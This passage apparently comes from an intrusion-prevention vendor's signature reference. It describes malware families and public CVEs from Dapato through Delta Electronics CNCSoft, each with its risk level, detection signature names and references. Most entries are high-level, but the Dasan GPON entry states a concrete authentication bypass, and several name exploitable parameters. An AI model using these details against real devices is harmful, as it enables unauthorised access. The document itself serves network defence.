Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Dapato is a Trojan that can install additional malware on the infected machine without consent.
Situation: HTTP_CRL-Dapato-Traffic
Back to top

Dark-Crystal-RAT-Infection-Traffic

About this vulnerability: Dark Crystal RAT infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1397-5242
Last changed: sgpkg-ips-1397-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Dark Crystal RAT infection traffic was detected.
Situation: HTTP_CSU-Dark-Crystal-RAT-Infection-Traffic
Back to top

Darkness-Bot

About this vulnerability: Darkness bot
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Darkness bot is a Windows malware that can be remotely controlled.
Situation: HTTP_CSU-Darkness-Bot-Activity
File-Text_Darkness-Bot-Activity
Back to top

Darkshell-Botnet

About this vulnerability: Darkshell Botnet
Risk: High
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Darkshell is a Botnet used for performing Distributed Denial of Service (DDoS) attacks.
Situation: Generic_SS-Darkshell-Botnet-Activity
File-Text_Darkshell-Botnet-Activity
Back to top

DarkVNC-C2-Traffic

About this vulnerability: DarkVNC C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1097-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: DarkVNC is a remote access trojan capable to create hidden VNC sessions on Windows computers. This situation may also trigger on other hVNC variants.
Situation: Generic_TCP-DarkVNC-C2-Traffic
Back to top

Darwin-Streaming-Server-Null-Byte

About this vulnerability: A Null byte handling vulnerability in RTSP server
Risk: Moderate
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Darwin Streaming Server
Type: Malfunction
Description: Darwin Streaming Server 5.0.1, and possibly earlier versions, allows remote attackers to cause a denial of service via a DESCRIBE request with a location that contains a null byte.
Situation: Generic_Darwin-Streaming-Server-Null-Byte-DoS
References:
CVE-2004-1123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1123
Back to top

Dasan-GPON-Router-Command-Injection

About this vulnerability: A vulnerability in Dasan GPON routers
Risk: High
First detected in: sgpkg-ips-1374-5242
Last changed: sgpkg-ips-1374-5242
Platform: Generic
Software: Dasan GPON
Type: Input Validation
Description: There exists a command injection vulnerability in Dasan GPON routers. A successful exploitation can allow unauthenticated attacker to run arbitrary commands via the dest_host parameter.
Situation: HTTP_CRL-Dasan-GPON-Router-Command-Injection
References:
CVE-2018-10562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10562
Back to top

Dasan-GPON-Routers-Authentication-Bypass-CVE-2018-10561

About this vulnerability: An attempt to exploit a vulnerability in Dasan GPON routers detected
Risk: High
First detected in: sgpkg-ips-1626-5242
Last changed: sgpkg-ips-1626-5242
Platform: Generic
Software: Dasan GPON
Type: Input Validation
Description: An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending "?images" to any URL of the device that requires authentication. One can then manage the device.
Situation: HTTP_CRL-Dasan-GPON-Routers-Authentication-Bypass-CVE-2018-10561
References:
CVE-2018-10561
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10561
Back to top

Data-Dynamics-ActiveBar-ActiveX-Control-actbar.ocx-Multiple-Insecure-Methods

About this vulnerability: A vulnerability in Data Dynamics ActiveBar
Risk: High
First detected in: sgpkg-ips-583-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Data Dynamics ActiveBar
Type: Input Validation
Description: There is a vulnerability in Data Dynamics ActiveBar. The vulnerability is due to insecure methods "Save()", "SaveLayoutChanges()", and "SaveMenuUsageData()" in the "ActiveBar3Library.ActiveBar3.3" ("actbar.ocx") ActiveX control that write to a file specified as an argument. Remote attackers could exploit this vulnerability to overwrite arbitrary files on the system in the context of the logged in user.
Situation: File-Text_Data-Dynamics-ActiveBar-ActiveX-Control-actbar.ocx-Multiple-Insecure-Methods
References:
CVE-2007-3883
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3883
BID-24959
http://www.securityfocus.com/bid/24959
OSVDB-37692
http://www.osvdb.org/37692
Back to top

DATAC-Control-RealWin-SCADA-System-Crafted-Packet-Handling-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in DATAC Control RealWin SCADA System
Risk: High
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP
Software: DATAC Control RealWin SCADA System
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in the DATAC Control RealWin SCADA System server product. The vulnerability is due to a boundary error while parsing a crafted value in a FC_INFOTAG/SET_CONTROL packet. Remote unauthenticated attackers could exploit this vulnerability by sending a malicious packet to the target server. A successful exploit can allow execution of arbitrary code with the privileges of the affected service, normally Administrator privileges on Windows systems, or cause a Denial of Service condition due to abnormal termination of the service.
Situation: Generic_CS-DATAC-Control-RealWin-SCADA-System-Crafted-Packet-Handling-BOF
References:
CVE-2008-4322
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4322
BID-31418
http://www.securityfocus.com/bid/31418
Back to top

DataLife-Engine-PHP-Code-Injection

About this vulnerability: A DataLife Engine PHP Code Injection vulnerability
Risk: High
First detected in: sgpkg-ips-781-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: DataLife Engine
Type: PHP Injection
Description: A vulnerability in DataLife Engine, vesion 9.7, which allows remote attackers to inject and execute arbitrary PHP code through the catlist and not-catlist tags in preview.php.
Situation: HTTP_CRL-DataLife-Engine-PHP-Code-Injection
References:
CVE-2013-1412
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1412
BID-57603
http://www.securityfocus.com/bid/57603
OSVDB-89662
http://www.osvdb.org/89662
Back to top

DC/OS-Marathon-UI-Docker-Exploit

About this vulnerability: A DC/OS Marathon UI Docker Exploit vulnerability
Risk: High
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: DCOS Marathon
Type: Input Validation
Description: A vulnerability in DC/OS which allows remote attackers to create a Docker container with the '/' path mounted with read/write permissions on the host server.
Situation: HTTP_CRL-DC/OS-Marathon-UI-Docker-Exploit
Back to top

DCOM-RPC-BOF-MS03-026

About this vulnerability: RPC DCOM interface buffer overflow vulnerability (MS03-026)
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT; Windows XP; Windows 2003; Windows 2000
Software: Windows DCOM RPC Service
Type: Buffer Overflow
Description: The RPC DCOM interface suffers from a weakness in the object activation request handling. When exploited successfully the vulnerability allows remote code execution with system privileges through a buffer overflow. Exploits are widely available in the Internet. The Blaster/MSblast/LovSAN and Nachi/Welchia worms exploit this vulnerability.
Situation: MSRPC-TCP_CPS-DCOM-RPC-Servername-BOF
MSRPC-UDP_CPS-DCOM-RPC-Servername-BOF
References:
CVE-2003-0352
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0352
BID-8205
http://www.securityfocus.com/bid/8205
OSVDB-2100
http://www.osvdb.org/2100
MS03-026
http://technet.microsoft.com/security/bulletin/MS03-026
Back to top

DCOM-Rpcss-Heap-BO-MS03-039

About this vulnerability: Remote exploitable heap bufferoverflow in DCOM RPCSS (MS03-039)
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows NT 4.0; Windows 2000; Windows XP; Windows 2003
Software: Windows DCOM RPC Service
Type: Buffer Overflow
Description: The filename parameter length check in the Windows RPC DCOM interface handling is not carried out. A heap overflow can be caused by a large parameter crashing the RpcSS service. Attackers using suitable data can run arbitary code with Local System privilege.
Situation: MSRPC-TCP_CPS-DCOM-Rpcss-Long-Filename-BOF
References:
CVE-2003-0528
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0528
BID-8459
http://www.securityfocus.com/bid/8459
OSVDB-2535
http://www.osvdb.org/2535
MS03-039
http://technet.microsoft.com/security/bulletin/MS03-039
Back to top

DD-WRT-Arbitrary-Command-Execution

About this vulnerability: A DD-WRT-Arbitrary Command Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-1640-5242
Platform: Generic
Software: DD-WRT
Type: Input Validation
Description: A vulnerability in the DD-WRT firmware version v24-sp1 which allows remote attackers to execute arbitrary commands via metacharacters in a HTTP GET request to /cgi-bin/.
References:
CVE-2009-2765
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2765
BID-35742
http://www.securityfocus.com/bid/35742
OSVDB-55990
http://www.osvdb.org/55990
Back to top

Ddoser-Bot

About this vulnerability: DDoser Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: DDoser is a Bot that is used to perform Distributed Denial of Service attacks.
Situation: HTTP_CRL-Ddoser-Bot-Traffic
Back to top

Debian-Installation-Package

About this vulnerability: Debian binary installation package
Risk: Low
First detected in: sgpkg-ips-179-2032
Last changed: sgpkg-ips-1296-5242
Platform: Debian GNU/Linux; Ubuntu Linux
Software: <os>
Type: Insecure Configuration
Description: The Debian GNU/Linux distribution, as well as other Linux distributions that are based on Debian, such as Ubuntu, use specific binary packages for application installation. These installation packages can be used to import executable content into the target system.
Situation: HTTP_SS-Debian-Binary-Installation-Package-Download
File-Binary_Debian-Binary-Installation-Package
Back to top

Default-User-And-Password

About this vulnerability: Default user and password vulnerability
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: IRIX
Software: <os>
Type: Insecure Configuration
Description: Some older Irix operating systems have a default usernames. Is possible to remotely login to these accounts thus compromising the host
Situation: FTP_CS-Default-IRIX-Account-OutOfBox
FTP_CS-Default-IRIX-Account-4dgifts
FTP_CS-Default-IRIX-Account-Ezsetup
FTP_CS-Default-IRIX-Account-Guest
Telnet_CTS-Default-IRIX-Account-OutOfBox
Telnet_CTS-Default-IRIX-Account-4dgifts
Telnet_CTS-Default-IRIX-Account-Ezsetup
Telnet_CTS-Default-IRIX-Account-Guest
References:
CVE-1999-0502
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0502
Back to top

Delegate-Proxy-Buffer-Overflow

About this vulnerability: FreeBSD Delegate Proxy Buffer Overflow
Risk: High
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: FreeBSD
Software: Delegate Proxy
Type: Buffer Overflow
Description: The FreeBSD Delegate Proxy (a third-party application) suffers from multiple buffer overflow bugs, which can be exploited to gain the privileges of the proxy (default is nobody).
Situation: Generic_CS-FreeBSD-Delegate-Proxy-BOF-1
Generic_CS-FreeBSD-Delegate-Proxy-BOF-2
References:
CVE-2000-0165
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0165
Back to top

Delfin-Media-Viewer

About this vulnerability: Delfin Media Viewer browser plugin
Risk: Low
First detected in: sgpkg-ips-33-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Delfin Media Viewer
Type: Misconfiguration
Description: Delfin Media Viewer is a browser plugin and may be considered unwanted software by some organizations. It displays advertisements.
Situation: HTTP_CSH-Delfin-Media-Viewer-g181511-User-Agent
HTTP_CSH-Media-Viewer-StubInstStat-User-Agent
HTTP_CSH-Delfin-Media-Viewer-PromulGate-User-Agent
Back to top

Dell-EMC-iDRAC-Cgi-Injection-CVE-2018-1207

About this vulnerability: A vulnerability in Dell EMC iDRAC
Risk: High
First detected in: sgpkg-ips-1241-5242
Last changed: sgpkg-ips-1640-5242
Platform: Generic
Software: Dell EMC iDRAC
Type: Malfunction
Description: There exists a CGI injection vulnerability in Dell EMC iDRAC. Successful exploitation could lead in remote code execution.
Situation: HTTP_URI-Embedthis-GoAhead-Web-Server-Cgi-Remote-Code-Execution
References:
CVE-2018-1207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1207
Back to top

Dell-EMC-Storage-Manager-EMConfigmigration-Servlet-Directory-Traversal

About this vulnerability: A vulnerability in Dell Storage Manager
Risk: Moderate
First detected in: sgpkg-ips-1045-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dell Storage Manager
Type: Input Validation
Description: Improper request validation causes a directory traverstal vulnerability in Dell EMC Storage Manager. A successful exploit allows an attacker to disclose arbitrary files on the target system.
Situation: HTTP_CSU-Dell-EMC-Storage-Manager-EMConfigmigration-Servlet-Directory-Traversal
References:
CVE-2017-14384
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14384
Back to top

Dell-EMC-Vmax-Virtual-Appliance-Manager-Authentication-Bypass

About this vulnerability: A vulnerability in EMC Dell EMC Solutions Enabler Virtual Appliance
Risk: Moderate
First detected in: sgpkg-ips-1080-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dell EMC Solutions Enabler Virtual Appliance; Dell EMC Unisphere for VMAX Virtual Appliance; Dell EMC VASA Virtual Appliance; Dell EMC VMAX Embedded Management
Type: Malfunction
Description: There has been reported an authentication bypass vulnerability in Dell EMC VMAX Virtual Appliance (vApp). A remote unauthenticated attacker can exploit the vulnerability by authenticating to the target service with undocumented credentials. This vulnerability can be chained with CVE-2018-1215, which leads in arbitrary code execution.
Situation: HTTP_CRL-Dell-EMC-Vmax-Virtual-Appliance-Manager-Authentication-Bypass
References:
CVE-2018-1216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1216
Back to top

Dell-NetVault-Backup-Denial-Of-Service

About this vulnerability: A vulnerability in Dell NetVault Backup
Risk: High
First detected in: sgpkg-ips-675-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dell NetVault Backup
Type: Input Validation
Description: A denial of service vulnerability has been reported in Dell NetVault Backup. The vulnerability is due to an assertion failure when processing specially crafted data sent to TCP port 20031. A remote unauthenticated attacker can exploit this vulnerability to cause a denial of service condition on the target system.
Situation: Generic_CS-Dell-NetVault-Backup-Denial-Of-Service
References:
CVE-2015-5696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5696
Back to top

Dell-OpenManage-Network-Manager-MySQL-Improper-Access-Control

About this vulnerability: A vulnerability in Dell OpenManage Network Manager
Risk: High
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dell OpenManage
Type: Malfunction
Description: An improper access control vulnerability has been reported in Dell OpenManage Network Manager. The vulnerability is due to a combination of exposing the MySQL daemon on the public network interface, the existence of default credentials and an insecure configuration allowing read/write access to the filesystem from MySQL. A remote, unauthenticated user could exploit this vulnerability by connecting to the MySQL service on a target server using the default credentials. Successful exploitation of the vulnerabilities could lead to the execution of arbitrary SQL commands under the security context of root.
Situation: MySQL_CS-Dell-OpenManage-Network-Manager-MySQL-Improper-Access-Control
References:
CVE-2018-15768
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15768
Back to top

Dell-OpenManage-Web-Server-Buffer-Overflow

About this vulnerability: A vulnerability in Dell OpenManage Server
Risk: High
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Dell OpenManage
Type: Buffer Overflow
Description: A buffer overflow exists in Dell's OpenManage Web Server product that may allow remote attackers to cause a denial of service condition or inject arbitrary code.
Situation: Generic_CS-Dell-OpenManage-Web-Server-Buffer-Overflow
References:
CVE-2004-0331
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0331
BID-9750
http://www.securityfocus.com/bid/9750
Back to top

Dell-Scriptlogic-Asset-Manager-Getclientpackage-SQL-Injection

About this vulnerability: A vulnerability in Dell ScriptLogic Asset Manager
Risk: High
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dell ScriptLogic Asset Manager
Type: SQL Injection
Description: An SQL Injection vulnerability exists in Dell ScriptLogic Asset Manager. The vulnerability is due to insufficient input validation while processing requests to GetClientPackage.aspx. By sending crafted HTTP requests, a unauthenticated, remote attacker can exploit this vulnerability to execute code under the security context of the Network Service account.
Situation: HTTP_CSU-Dell-Scriptlogic-Asset-Manager-Getclientpackage-SQL-Injection
References:
CVE-2015-1605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1605
OSVDB-118627
http://www.osvdb.org/118627
Back to top

Dell-Scriptlogic-Asset-Manager-Getprocessedpackage-SQL-Injection

About this vulnerability: A vulnerability in Dell ScriptLogic Asset Manager
Risk: High
First detected in: sgpkg-ips-636-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dell ScriptLogic Asset Manager
Type: SQL Injection
Description: An SQL Injection vulnerability exists in Dell ScriptLogic Asset Manager. The vulnerability is due to insufficient input validation while processing requests to GetProcessedPackage.aspx. By sending crafted HTTP requests, an unauthenticated, remote attacker can exploit this vulnerability to execute code under the security context of the Network Service account.
Situation: HTTP_CRL-Dell-Scriptlogic-Asset-Manager-Getprocessedpackage-SQL-Injection
References:
CVE-2015-1605
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1605
BID-72697
http://www.securityfocus.com/bid/72697
OSVDB-118628
http://www.osvdb.org/118628
Back to top

Dell-SonicWall-Gms-Analyzer-License.Jsp-Information-Disclosure

About this vulnerability: A vulnerability in Dell SonicWALL GMS
Risk: Moderate
First detected in: sgpkg-ips-850-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SonicWall GMS; SonicWall Analyzer
Type: Malfunction
Description: Improper access control of the license.jsp page on Dell SonicWALL results in an information disclosure vulnerability, which an attacker can use to gain access to sensitive data.
Situation: HTTP_CSU-Dell-SonicWall-Gms-Analyzer-License.Jsp-Information-Disclosure
Back to top

Dell-SonicWall-Scrutinizer-methodDetail-SQL-Injection

About this vulnerability: A Dell SonicWall Scrutinizer methodDetail SQL Injection vulnerability
Risk: High
First detected in: sgpkg-ips-781-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SonicWALL Scrutinizer
Type: SQL Injection
Description: A vulnerability in Dell SonicWALL Scrutinizer, vesion 11.01, which allows remote attackers to write arbitrary files and execute remote code via an SQL injection to the methodDetail parameter in exporters.php.
Situation: HTTP_CS-Dell-SonicWall-Scrutinizer-SQL-Injection
References:
CVE-2014-4977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4977
BID-68495
http://www.securityfocus.com/bid/68495
Back to top

Dell-SonicWall-Scrutinizer-SQL-Injection

About this vulnerability: A Dell SonicWall Scrutinizer SQL Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SonicWALL Scrutinizer
Type: SQL Injection
Description: A vulnerability in SonicWALL Scrutinizer, versions before 9.5.2, in d4d/statusFilter.php, which allows remote attackers to execute arbitrary SQL commands via the q parameter.
Situation: HTTP_CS-Dell-SonicWall-Scrutinizer-SQL-Injection
References:
CVE-2012-2962
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2962
BID-54625
http://www.securityfocus.com/bid/54625
OSVDB-84232
http://www.osvdb.org/84232
Back to top

Dell-SonicWall-Universal-Management-Suite-Imagepreviewservlet-SQL-Injection

About this vulnerability: A vulnerability in Dell SonicWALL GMS
Risk: Moderate
First detected in: sgpkg-ips-833-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: SonicWall GMS
Type: Input Validation
Description: Insufficient validation of the logoID parameter in the ImagePreviewServlet function of Dell SonicWALL GMS causes an SQL injection vulnerability. A successful exploitation allows an attacker to run arbitrary code on the target system.
Situation: HTTP_CRL-Dell-SonicWall-Universal-Management-Suite-Imagepreviewservlet-SQL-Injection
Back to top

Dell-Storage-Manager-Emwebsiteservlet-Directory-Traversal

About this vulnerability: A vulnerability in Dell Storage Manager
Risk: Moderate
First detected in: sgpkg-ips-970-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Dell Storage Manager
Type: Input Validation
Description: Improper validation of HTTP requests causes a directory traversal vulnerability in Dell Storage Manager. A successful attack allows arbitrary files to be read from the target system.
Situation: HTTP_CSU-Dell-Storage-Manager-Emwebsiteservlet-Directory-Traversal
References:
CVE-2017-10949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10949
Back to top

Delta-CNCSoft-Screeneditor-Dpb-Giffile-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Delta Electronics CNCSoft
Risk: Moderate
First detected in: sgpkg-ips-1241-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Delta Electronics CNCSoft
Type: Buffer Overflow
Description: Improper handling of the GIFFILE element in DPB files causes a stack buffer overflow in Delta Electronics CNCSoft. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: File-Binary_Delta-Industrial-Automation-CNCSoft-Screeneditor-Dpb-Giffile-Stack-Buffer-Overflow
References:
CVE-2020-7002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7002
Back to top

Delta-Electronics-CNCSoft-Screeneditor-CVE-2021-43982-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Delta Electronics CNCSoft ScreenEditor.
Risk: High
First detected in: sgpkg-ips-1469-5242
Last changed: sgpkg-ips-1469-5242
Platform: Windows
Software: Delta Electronics CNCSoft
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability in Delta Electronics CNCSoft ScreenEditor, versions 1.01.30 and prior, which allows remote attackers to execute arbitrary code by enticing a target user into opening a crafted DPB file, due to lack of proper validation of the length of user-supplied data prior to copying to a fixed-length stack buffer.
Situation: File-Binary_Delta-Electronics-CNCSoft-Screeneditor-CVE-2021-43982-Stack-Buffer-Overflow
References:
CVE-2021-43982
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43982
Back to top

Delta-Electronics-CNCSoft-Screeneditor-Element-Section-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Delta Industrial Automation CNCSoft ScreenEditor.
Risk: High
First detected in: sgpkg-ips-1398-5242
Last changed: sgpkg-ips-1398-5242
Platform: Generic
Software: Delta Electronics CNCSoft
Type: Buffer Overflow
Description: A vulnerability in Delta Industrial Automation CNCSoft ScreenEditor, versions before 1.01.30, which allows remote attackers to execute arbitrary code by by enticing a target user into opening a crafted DPB file, due to improper handling of Element Section in DPB files.
Situation: File-Binary_Delta-Electronics-CNCSoft-Screeneditor-Element-Section-Stack-Buffer-Overflow
References:
CVE-2021-22672
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22672
Back to top

Delta-Electronics-CNCSoft-Screeneditor-File-Preview-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Delta Electronics ScreenEditor
Risk: Moderate
First detected in: sgpkg-ips-1562-5242
Last changed: sgpkg-ips-1562-5242
Platform: Generic
Software: Delta Electronics ScreenEditor; Delta Electronics CNCSoft
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability has been reported in Delta Electronics CNCSoft ScreenEditor module. The vulnerability is due to lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack buffer. A remote attacker can exploit this vulnerability by enticing a target user into previewing a crafted DPB file. Successfully exploiting this vulnerability could result in denial of service or, in the worst case, arbitrary code execution.
Situation: File-Binary_Delta-Electronics-CNCSoft-Screeneditor-File-Preview-Stack-Buffer-Overflow
References:
CVE-2022-4634
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4634
Back to top

Delta-Electronics-Industrial-Automation-Ahsim_5x0-Simulator-Buffer-Overflow

About this vulnerability: A vulnerability in Delta Electronics Industrial Automation COMMGR
Risk: Moderate
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Delta Electronics Industrial Automation COMMGR
Type: Buffer Overflow
Description: Improper handling of a length value causes a buffer overflow vulnerability in Delta Electronics Industrial Automation COMMGR. A successful exploit may allow an attacker to execute arbitrary code on the target system.
Situation: Generic_CS-Delta-Electronics-Industrial-Automation-Ahsim_5x0-Simulator-Buffer-Overflow
References:
CVE-2018-10594
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10594
Back to top

Delta-Electronics-Infrasuite-Device-Master-Activemq-Insecure-Deserialization

About this vulnerability: A vulnerability in Delta Electronics InfraSuite Device Master
Risk: High
First detected in: sgpkg-ips-1632-5242
Last changed: sgpkg-ips-1632-5242
Platform: Generic
Software: Delta Electronics InfraSuite Device Master
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Delta Electronics InfraSuite Device Master. The vulnerabilities is due to input validation error within the installed instance of Apache ActiveMQ. A remote, unauthenticated attacker could exploit these vulnerabilities by sending crafted requests to the target server. Successful exploitation could result in arbitrary code execution under the security context of the administrator.
Situation: Generic_CS-Suspicious-Java-Serialized-Object
References:
CVE-2023-1133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1133
Back to top

Delta-Electronics-Infrasuite-Device-Master-datacollect-Insecure-Deserialization

About this vulnerability: A vulnerability in Delta Electronics InfraSuite Device Master
Risk: High
First detected in: sgpkg-ips-1536-5242
Last changed: sgpkg-ips-1536-5242
Platform: Generic
Software: Delta Electronics InfraSuite Device Master
Type: Input Validation
Description: An insecure deserialization vulnerability exists in Delta Electronics InfraSuite Device Master. The vulnerability is due to missing input validation when processing messages sent to Device-DataCollect service. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted request to the target server. Successful exploitation allows arbitrary code execution with privileges of the user running the vulnerable software.
Situation: Generic_CS-Delta-Electronics-Infrasuite-Device-Master-datacollect-Insecure-Deserialization
References:
CVE-2022-38142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38142
Back to top

Delta-Electronics-Infrasuite-Device-Master-Gextrainfo-Insecure-Deserialization

About this vulnerability: A vulnerability in Delta Electronics InfraSuite Device Master
Risk: Moderate
First detected in: sgpkg-ips-1805-5242
Last changed: sgpkg-ips-1805-5242
Platform: Generic
Software: Delta Electronics InfraSuite Device Master
Type: Input Validation
Description: Insecure deserialization of JSON objects in the _gExtraInfo JSON key causes a vulnerability in Delta Electronics InfraSuite Device Master. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Delta-Electronics-Infrasuite-Device-Master-Gextrainfo-Insecure-Deserialization
References:
CVE-2024-10456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10456
Back to top

Delta-Electronics-Infrasuite-Device-Master-Opcode-512-Directory-Traversal

About this vulnerability: A vulnerability in Delta Electronics InfraSuite Device Master
Risk: High
First detected in: sgpkg-ips-1568-5242
Last changed: sgpkg-ips-1568-5242
Platform: Generic
Software: Delta Electronics InfraSuite Device Master
Type: Directory Traversal
Description: A directory traversal vulnerability has been reported in Delta Electronics InfraSuite Device Master. The vulnerability is due to improper processing of opcode 512 request within CtrlLayerNWCmd_FileOperation. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result, in the worst case, remote code execution under the security context of the user running the vulnerable software.
Situation: Generic_CS-Delta-Electronics-Infrasuite-Device-Master-Opcode-512-Directory-Traversal
References:
CVE-2022-41657
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41657
Back to top

Delta-Electronics-Infrasuite-Insecure-Deserialization-CVE-2023-47207

About this vulnerability: A vulnerability in Delta Electronics InfraSuite Device Master
Risk: High
First detected in: sgpkg-ips-1749-5242
Last changed: sgpkg-ips-1749-5242
Platform: Generic
Software: Delta Electronics InfraSuite Device Master
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Delta Electronics InfraSuite Device Master. The vulnerability is due to the insecure deserialization of JSON objects in the fieldExtraInfo JSON key. A remote, unauthenticated attacker could exploit the vulnerability by sending crafted requests to the target server. Successful exploitation can result in arbitrary code execution on the target server, under the security context of the user running the Device-DataCollect and Device-Gateway services.
Situation: HTTP_CS-Delta-Electronics-Infrasuite-Potential-Insecure-Deserialization-CVE-2023-47207
HTTP_CS-Delta-Electronics-Infrasuite-Insecure-Deserialization-CVE-2023-47207
References:
CVE-2023-47207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47207
Back to top

Delta-Industrial-Automation-CNCSoft-Screeneditor-CVE-2022-1405-SBOF

About this vulnerability: A vulnerability in Delta Industrial Automation CNCSoft ScreenEditor.
Risk: High
First detected in: sgpkg-ips-1503-5242
Last changed: sgpkg-ips-1503-5242
Platform: Generic
Software: Delta Electronics CNCSoft
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability in Delta Industrial Automation CNCSoft ScreenEditor, versions 1.01.31 and prior, which allows remote attackers to execute arbitrary code by sending a crafted DPB file, due to lack of proper validation of the length of user-supplied data prior to copying to a fixed-length stack buffer.
Situation: File-Binary_Delta-Industrial-Automation-CNCSoft-Screeneditor-CVE-2022-1405-SBOF
References:
CVE-2022-1405
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1405
Back to top

Delta-Industrial-Automation-CNCSoft-Screeneditor-Element-Name-Stack-BOF

About this vulnerability: A vulnerability in Delta Electronics ScreenEditor
Risk: Moderate
First detected in: sgpkg-ips-1320-5242
Last changed: sgpkg-ips-1320-5242
Platform: Generic
Software: Delta Electronics CNCSoft
Type: Buffer Overflow
Description: A stack-based buffer overflow has been reported in Delta Industrial Automation CNCSoft ScreenEditor. The vulnerability is due to improper parsing of DPB files. An unauthenticated, remote attacker can exploit this vulnerability by enticing a target user into opening a crafted project file. Successful exploitation could result in execution of arbitrary code under the security context of the user running CNCSoft ScreenEditor.
